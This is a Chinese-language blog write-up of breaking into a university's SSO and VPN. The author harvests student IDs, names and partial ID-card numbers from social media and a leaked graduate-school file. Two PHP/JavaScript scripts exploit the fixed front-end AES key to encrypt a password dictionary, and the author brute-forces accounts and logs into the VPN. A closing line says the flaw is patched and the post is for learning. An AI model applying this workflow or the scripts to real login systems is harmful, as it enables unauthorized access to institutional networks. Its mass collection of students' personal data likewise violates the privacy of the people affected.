漏洞挖掘 | 登录某大学VPN系统

gclome

原文链接：漏洞挖掘 | 登录某大学VPN系统

现在的大学日常都是sso统一身份认证，难搞哦

• 寻找废弃站点，作为突破口
• 信息搜集啊，信息搜集
  

信息搜集

加上了他们大学类似表白墙之类的小姐姐的QQ
一通乱翻好多学号+姓名，不再一一列出了
得到一个名字：赵天宇！霸气！就你了！
​
打开以看，各种信息免费赠送
​
共33页，一千二百多个身份证后四位
知道这是个研究生，进入研究生院
一通乱翻
​
找到这么个文件，下载下来后
2800多条研究生信息（后来一查，基本是全部的了）
​

登陆系统

通过信息搜集知道，sso需要学号和身份证后六位登录
通过刚才获取到的信息
我们已经知道了最起码1200条学号、姓名和身份证号后四位
他们学校基本都是展示页面，其他的都需要内网访问，但是还存在一个智慧校园
​
这里不存在验证码，可以爆破，但是对密码做了aes加密
​
不难看出加密在前端，直接定位关键js文件
可以看出加密的key都是固定得
​
偷个懒，把js下载下来
写程php代码，将生成的密码字典加密
encry_js.php

1. <html>
   
2.     <head>
   
3.         <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   
4.         <script type="text/javascript" src="js/security.js"></script>
   
5.         <script type="text/javascript" src="js/login.js"></script>
   
6.         <script type="text/javascript">
   
7.             function file(pass){
   
8.                 var pass = pass;
   
9.                 var pwd = checkPassLogin(pass);
   
10.                 // // document.write("<span>"+ pwd +"</span>");
    
11.                 var xhr = null;
    
12.                 if(window.XMLHttpRequest){
    
13.                     xhr = new XMLHttpRequest();
    
14.                 }else{
    
15.                     xhr = new ActiveXObject("Microsoft.XMLHTTP");
    
16.                 }
    
17. 
    
18.                 //准备发送
    
19.                 xhr.open("post","http://127.0.0.1:92/js/encry.php",true);//这里的发送方式取决于后台，true待变异步发送
    
20.                 xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded;charset=UTF-8");// 向请求添加 HTTP 头，POST如果有数据一定加加！！！！
    
21.                 var value = "value="+pwd + "&pass=" + pass;//定义发送内容
    
22.                 // console.log(value)
    
23.                 xhr.send(value);
    
24.                 xhr.onreadystatechange=function(){
    
25.                     if (xhr.readyState == 4 && xhr.status == 200){//说明请求完成/响应200，说明请求成功
    
26.                         var request = xhr.responseText;//获取响应的内容
    
27.                         // console.log(request);
    
28.                         // if (request == "ok"){
    
29.                         //     document.write("<span>"+ pwd +"</span>");
    
30.                         // }else{
    
31.                         // }
    
32.                         // document.write("<span>"+ request +"</span>\n");
    
33.                     }
    
34.                 }
    
35.             }
    
36.         </script>
    
37.     </head>
    
38.     <body>
    
39.     <?php
    
40.         $file = fopen(".\\1134.txt", "r");
    
41.         //输出文本中所有的行，直到文件结束为止。
    
42.         while(! feof($file))
    
43.         {
    
44.             $password= trim(fgets($file));
    
45.             echo "<script>file('".$password."')</script>";
    
46.         }
    
47.         fclose($file);
    
48.     ?>
    
49.     </body>
    
50. <html>

复制代码

encry.php

1. <?php
   
2. $value = $_POST['value'];
   
3. // $pass = $_POST['pass'];
   
4. // if($value == "2867a2bb26a41ddde23ad4747693123d20feae03a18c1ffd68be6105e0ec594eca82cc3160d46189335704c0389ee928669d89520ccc36d59ed408ad603d10a59f10e7c7afa8eb877d821e1521dc5f1152bf149cb407476a775fcbb057dc98d7312402a06b313341441d1d2c883e77d1a254d119c98aa7830a171df02ad4e37f"){
   
5. // file_put_contents("1.txt", $pass, FILE_APPEND);
   
6. // }
   
7. $value = $value."\n";
   
8. file_put_contents("test-1134.txt", $value, FILE_APPEND);
   
9. 
   
10. ?>

复制代码

最后在爆破的时候，第三章账号成功得到了账号/密码

上面注释就是密码的字符串，但是绕我修改密码才能进入，苟的很
​
点击修改密码又不让访问，还能不能更苟
​
直接下载他们的vpn软件
使用刚才的账号密码，成功登录
​
校内资源任意访问
​
end
该漏洞已经修补完毕，大家学习下姿势即可